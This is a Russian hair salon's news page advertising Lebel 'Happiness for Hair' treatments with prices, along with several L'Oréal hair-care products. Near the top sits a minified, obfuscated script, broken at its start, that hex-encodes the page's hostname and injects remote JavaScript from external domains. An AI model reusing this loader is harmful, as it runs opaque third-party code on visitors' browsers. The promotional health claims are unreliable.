<p> </p>
<p><strong>Парикмахерские</strong><br /><strong> услуги</strong></p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('[t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("cp9.megagroup.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

" class="j-img" />

 

Парикмахерские
услуги

Главная / Новости

Новости

Счастье для волос– эксклюзивная японская процедура от Lebel Cosmetics.  20.01.2013 00:30

                                                Счастье для волос LEBEL

      Подарить волосам здоровье, сделать их более сильными, плотными, шелковистыми и блестящими поможет процедура «счастье для волос»  Lebel Cosmetics.

     Что же представляет собой эта волшебная процедура «Счастье для волос» от Lebel Cosmetics ?
Счастье для волоc Lebel – уникальная японская процедура многофазного лечения волос и кожи головы.     
     Благодаря процедуре Счастье для волос Lebel волосы восстанавливаются, преображаются и обновляются. Эффект от процедуры Счастье для волос Lebel держится не менее трех недель! Никакое другое  средство не воздействует  на волосы так глубоко и так надолго как средства  SPA-лечения - счастье для волос Lebel
« Счастье для волос » от Lebel представляет собой процедуру, которая проходит в три этапа:
 
1 Этап процедуры Счастье для волос Lebel - Лечение волос изнутри ;
    Сыворотка С -  Подготовка к лечению, молекулярное восстановление и питание структуры волос. Подготавливает волосы к процессу лечения, обеспечивая молекулярное проникновение и закрепление компонентов последующих сывороток, восстанавливает межклеточные связи, питает и защищает волос изнутри.
   Сыворотка N - интенсивно увлажняет и восстанавливает поврежденную структуру  волос. Обновляет и оживляет повреждённые волосы, утратившие структуру. Восстанавливает межклеточные связи.
 Сыворотка P – придает упругость и гибкость поврежденным  волосам, утратившим структуру, утолщает и питает волосы. Восстанавливает белковую структуру, придает упругость волосам.
  Фиксирующий элемент Element Fix - Фиксирует и закрепляет результат применения сывороток, возвращает гибкость и упругость, сохраняет увлажнение и блеск  волос, утративших структуру. Применяется обязательно, как завершающий шаг первого этапа процедуры «Счастье для волос»
 
2 Этап процедуры Счастье для волос Lebel - Восстановление волоса снаружи (укрепление и разглаживание чешуек волоса);
Happiest Gum Lipid 1 и Happiest Gum Lipid 2  - Внешнее  восстановление и  оживление волос. Дарит поврежденным волосам мягкость и гибкость. Восстановление натурального  липидного слоя волоса. Цель этого этапа процедуры «Счастье для волос» – закрепить результат применения сывороток, чтобы все витамины остались надолго внутри  волоса, а самое главное обновление теперь уже самих кутикул волос.
Только в сочетании Gum Lipid 1 и Happiest  Gum Lipid 2 начинает работать процедура «Счастье для волос» и достигается максимальный результат лечения и полное обновление волос.
 
     3 этап процедуры Счастье для волос Lebel - Стимуляция роста волос, уход за кожей головы, укрепление волосяных фолликулов, профилактика выпадения волос, вызванных различными факторами (сезонное выпадение,  выпадение волос от стрессов и после любого химического воздействия: окрашивание, мелирование, обесцвечивание, химическая завивка или выпрямление).
     Последний этап Счастья для волос Lebel улучшает состояние кожи, успокаивает, снимает зуд, раздражение,  создает неповторимый отдых для кожи головы, способствует улучшению роста волос.
     В состав всех сывороток и масок, которые включает лечение Lebel – Счастье для волос,  входят аминокислоты, липиды, протеины и керамиды. Сыворотки способствуют восстановлению разрушенных межклеточных связей, питают, насыщают влагой и защищают волосы, придают им гибкость, упругость и блеск.
      Результат уже заметен после первой процедуры Счастье для волос. А после третьей процедуры Счастье для волос Lebel восстанавливаются даже самые поврежденные, слабые, безжизненные и тусклые волосы. Счастье для волос Lebel — это настоящая чудо-процедура, благодаря которой волосы волшебным образом преображаются.
«Счастье для волос» от Lebel лучше всего проводить курсом 5-6 раз,  с периодом 1 раз в 2 недели.
 
    Мечтаете, чтобы Ваши волосы были здоровыми, упругими, плотными и блестящими выбирайте лечение от Lebel «Счастье для волос».

Уникальная процедура для полного восстановления волос Счастье для волос от Lebel. Уже после первой процедуры «Счастье для волос» волосы становятся более плотными, шелковистыми на ощупь, легко поддаются укладке. Салон красоты Lovely, м.ВДНХ, т.686-11-11, 682-71-83


Стоимость процедуры:
короткие-2000
средние- 2500
длинные-3000
оч.длинные-3500




Гамма новых продуктов по уходу за окрашенными волосами  12.01.2013 05:04

                         

Лаборатории L’Oréal совершают инновационный прорыв в мире ухода за окрашенными волосами и представляют гамму Cristalceuticреволюцию в защите цвета окрашенных волос.

Новая запатентованная молекула GlucoMineral отличается от всех прошлых технологий защиты цвета, основанных на создание защитной пленки на поверхности волоса. Молекула GlucoMineral состоит из глюкозы и цинка и благодаря своей формуле способна проникать глубоко в структуру волоса, сцепляться с пигментом красителя и удерживать его внутри, обеспечивая эффективную защиту от вымывания цвета. День за днем пигмент красителя остается внутри волоса, и цвет окрашенных волос остается таким же ярким, как в день окрашивания.




INOA ODS2 - РЕВОЛЮЦИЯ В МИРЕ ОКРАШИВАНИЯ от L’Oreal Professionnel   28.12.2012 06:23

Представляем главный запуск 2012 года – Революционный краситель нового поколения INOA ODS2, феномен технологической инновации.

Теперь профессиональный краситель для волос INOA представлен в новом формате и с новой технологией. Система окрашивания стала еще проще, быстрее и эффективнее.
INOA ODS2 - это окрашивание будущего, подтвержденное 22 патентами.
Благодаря окрашиванию краской INOA ODS2 ваши волосы получают:
- Интенсивное питание: формула обогащена аргановым маслом, которое восстанавливает липидный капитал волоса.
- Оптимальную защиту: очищающая основа без сульфатов и экстракт зеленого чая, природный антиоксидант.
- Уникальное чувственное ощущение: насыщенный мусс и обволакивающие текстуры создают пленку для непревзойденной мягкости волос за волосом.
- Покрытие седины - до 100%.
- Широкую палитру оттенков - 60 самых популярных оттенков.

Прекрасный результат: новая революционная технология INOA ODS2 обеспечивает 6 недель интенсивного увлажнения и питания волос после окрашивания: волосы становятся значительно мягче и приобретают на 50% больше блеска. 




Мythic Oil  14.10.2012 05:26

В гамме средств Mythic Oil появились сразу несколько новинок этого масла — масло-сияние для окрашенных волос Color Glow Oil, укрепляющее молочко-вуаль для всех типов волос Milk, дисциплинирующее масло для непослушных волос Rich Oil.В масле Rich Oil использован комплекс из двух масел природного происхождения, арганового и масла рисовых отрубей. Аргановое масло называет "жидким золотом Марокко" — оно богато витаминами А, D и Е, жирными кислотами, поэтому интенсивно питает волосы. А масло рисовых отрубей — источник витамина Е, также обладает регенерирующим действием. Масло можно применять перед укладкой и после нее — для придания блеска. Средства быстро впитываются, моментально делая волосы гладкими, блестящими — и послушными, при этом не делая волосы тяжелыми.



ФАЙБЕРСЬЮТИК (FIBERCEUTIC)- уход за волосами   03.09.2012 07:27

ФАЙБЕРСЬЮТИК (FIBERCEUTIC) -ультра-эффективная услуга, вдохновленная новейшими научными достижениями в эстетической косметологии.
Сегодня Serie Expert создает новую категорию в профессиональном уходе за волосами - HAIRCEUTIC (эстетическая косметология для волос).

Для очень поврежденных волос. Мгновенное восстановление глубоко внутри волоса.
Результат : внутренняя структура волоса восстановлена.Длительное действие.



X-TENZO -химическое выпрямление от L`Oreal.  15.08.2012 06:37

Девушкам с прямыми волосами обладательниц кудрявых волос не понять. То же и наоборот: кудрявые от природы девушки жалуются на то, что волосы не слушаются, пушатся, путаются и выглядят неухожено. И хотят их выпрямить любым доступным способом. В ход идут специальные ухаживающие средства, фен в сочетании с расческой и горячие утюжки. А мы можем предложить
средство, с которым можно забыть о ежедневном разглаживании волос, по меньшей мере, на 2 месяца. Это химическое выпрямление X-Tenso от L`Oreal.



INOACOLOR CARE  28.07.2012 06:30

ИННОВАЦИЯ 2012!
INOACOLOR CARE
ПЕРВАЯ ГАММА УХОДОВ, РАЗРАБОТАННАЯ СПЕЦИАЛЬНО ДЛЯ ВОЛОС, ОКРАШЕННЫХ INOA
от L’Oréal Professionnel



COVER   10.07.2012 06:33

Не так давно красить волосы могли только женщины, а мужчины были вынуждены мириться и с цветом, которым их наградила природа, и с сединой. Но благодаря новым красителям Cover 5` от L`Oreal, специально разработанным для окрашивания волос мужчин, эта проблема в нашем салоне навсегда осталась в прошлом.



Кондиционер для поддержания цвета - LOreal Professional Serie Expert Chroma Care Conditioner.   05.05.2012 06:40

Мы рады предложить Вам новинку этого сезона весна - лето 2012 года
кондиционер для поддержания цвета - LOreal Professional Serie Expert Chroma Care Conditioner.
Кондиционеры этой линии имеют прямые красящие пигменты и помогают сохранить яркость и насыщенность цвета ваших волос в перерывах между окрашиваниями. Кроме того, используя Chroma Care Conditioner Вы сможете подарить модные цветовые нюансы натуральному цвету ваших волос. В состав кондиционера входит масло абрикоса, которое питает и смягчает Ваши волосы. После использования кондиционера цвет волос становится более ярким и живым, появляется блеск и волосы легко расчесываются.



Страницы: [ 1 ] [ 2 ] [ 3 ] [ 4 ] 5